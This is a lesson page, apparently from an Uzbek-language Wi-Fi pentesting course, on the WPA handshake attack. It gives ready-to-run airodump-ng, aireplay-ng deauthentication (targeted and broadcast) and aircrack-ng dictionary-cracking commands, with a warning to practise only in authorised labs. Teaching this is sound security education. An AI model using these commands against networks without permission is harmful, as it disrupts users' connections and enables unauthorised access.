Modulga qaytish
O'quv darsi / Wi-Fi Pentesting (WPA/WPA2)

Klassik Handshake hujumi

Agar tarmoqda faol mijoz bo'lsa, uni qisqa muddatga uzib, qayta ulanish vaqtida WPA handshake'ni ushlaymiz va lug'at hujumi bilan parolni topishga harakat qilamiz.

25 daq.ilg'or4 komanda3/8
Dars holati
Davom etmoqda
Amaliy komandalar0/4
Maqsadlar
  • Maqsadli yozuvni boshlash
  • Deauth hujumi
  • Lug'at hujumi
Faqat ruxsat etilgan muhitda mashq qiling

Bu darsdagi buyruqlar o'quv simulyatori va o'zingizga tegishli lablar uchun. Begona tizimlarni skanlash yoki sinash qonuniy javobgarlikka olib keladi.

O'qish

1. Yozuvni boshlash

Maqsadli kanal va BSSID bo'yicha airodump-ng ni ishga tushiring va capture_handshake fayliga yozing.

2. Deauthentication

Yangi terminalda mijozni qisqa muddatga uzing. Birinchi terminalda 'WPA handshake: ...' yozuvi paydo bo'lsa, Ctrl+C bilan to'xtating.

3. Parolni qidirish

rockyou.txt lug'ati bilan aircrack-ng ishga tushiring. Parol lug'atda bo'lsa, KEY FOUND! ekrani chiqadi.

Komandalar

Run tugmasi buyruqni o'ngdagi simulyatorga yuboradi; Copy esa real Kali terminalingiz uchun.

0%
$sudo airodump-ng -c 5 --bssid 7C:8B:CA:B8:B3:B4 -w capture_handshake wlan0mon
$sudo aireplay-ng -0 5 -a 7C:8B:CA:B8:B3:B4 -c A4:6B:40:79:76:AE wlan0mon
Maqsadli mijoz
$sudo aireplay-ng -0 5 -a 7C:8B:CA:B8:B3:B4 wlan0mon
Broadcast deauth
$aircrack-ng -w /usr/share/wordlists/rockyou.txt capture_handshake-01.cap